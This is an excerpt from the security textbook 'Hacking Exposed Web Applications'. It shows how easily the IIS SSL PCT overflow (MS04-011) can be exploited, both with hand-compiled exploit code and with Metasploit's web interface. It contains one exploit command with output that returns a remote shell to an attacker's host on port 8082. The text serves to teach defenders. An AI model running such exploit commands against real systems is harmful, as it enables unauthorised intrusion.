Point-And-Click Exploitation Using Metasploit

The Metasploit Framework is an open-source platform for developing, testing, and launching exploit code. It is easily extended with pluggable exploit modules contributed by the worldwide community of folks engaged in "legal penetration testing and research purposes only," according to the Metasploit web site. Metasploit runs on most Linux/UNIX platforms with Perl available. A Cygwin-based version is provided for Windows systems. Metasploit provides for easy exploitation of all types of vulnerabilities, including web platform holes. For those interested in a commercially supported tool like Metasploit, check out CORE IMPACT from Core Security Technologies, or CANVAS by Immunity. For links to further information about Metasploit, CORE IMPACT, and CANVAS, see "References and Further Reading" at the end of this chapter.

To understand the ease of use that Metasploit provides, we'll first walk through an example of exploiting a common web platform software defect the old-school way, without the Framework. As we saw in Chapter 2, it's fairly straightforward to discover the make and model of a web server. It's also no real stretch to research published vulnerabilities in the identified server software. Let's take, for example, the SSL PCT remote buffer overflow condition that exists for IIS, as described in Microsoft Security Bulletin MS04-011. Now, all an attacker needs to do is find some exploit code. For this example we went to www.k-otik.com and found a very useful packaged exploit for the SSL PCT vulnerability.

After downloading the exploit code and naming it iisexploit.c, we attempt to compile it. For the average script kiddie, getting exploit code to compile is not always a simple task, especially with code that is likely cobbled together from multiple sources with injudicious (and often purposefully mischievous) splicing. Some time later, after resolving multiple compiler errors related to missing header files, libraries, invalid references, and so on, plus a couple of trips to Google to remind us how to set basic compiler parameters, we now have our iisexploit.exe ready to run.

Launching iisexploit.exe from the command line is fairly straightforward (relative to compiling it):

    C:\> iisexploit www.site.com myserver 8082
    THCIISSLame v0.3 - IIS 5.0 SSL remote root exploit
    tested on Windows 2000 Server german/english SP4
    by Johnny Cyberpunk (jcyberpunk@thc.org)

    [*] building buffer
    [*] connecting the target
    [*] exploit send
    [*] waiting for shell
    [*] Exploit successful ! Have fun !

The exploit returns a shell to the attacker's system on the predetermined port 8082. As you just witnessed, exploiting a known vulnerability is quite simple and doesn't require much work. But in our culture of immediate gratification, the process we just drilled through is still too much work. And, frankly, we're lazy and have books to write. So we want the easy way, and thankfully there are useful applications that automate the entire process.

We'll now walk through the same example using Metasploit to illustrate the power and efficiency of the tool, even in the hands of semi-skilled adversaries. We first grab the Framework distribution, install it, and we're ready to roll with prepackaged exploits within five minutes. Metasploit even sports a swift installation wizard. How convenient, and people think hacking is hard work. Once installed, Metasploit can be accessed by either its command-line or web interface. Since we're big fans of web applications, we'll use the web GUI for our demonstration.

After launching Metasploit, we see a listing of all of the exploits it supports, as shown in Figure 3-1.


Figure 3-1: Playing "Pick your exploit" with Metasploit

We spot the Microsoft SSL PCT overflow exploit and select it. Metasploit then displays a helpful screen that provides a description of the vulnerability, complete with references! In the screen shown in Figure 3-2, we choose the type of system our target is running. Our earlier research told us that the web server is running Win2k SP1, so we select that version.


Figure 3-2: Metasploit makes hacking so easy a monkey can do it.

After selecting the target, Metasploit displays the next screen that enables us to select from a number of payloads that can be delivered to the server. For this attack, a simple remote shell would be a good choice. Once we hit the Exploits button, Metasploit displays the success status of the payload delivery, and we're presented with console access to the remote server, as shown in Figure 3-3.


Figure 3-3: Exploit successful!

See how easy that was? Now where's the fun in that?



Hacking Exposed Web Applications
HACKING EXPOSED WEB APPLICATIONS, 3rd Edition
ISBN: 0071740643
Year: 2006
Pages: 127
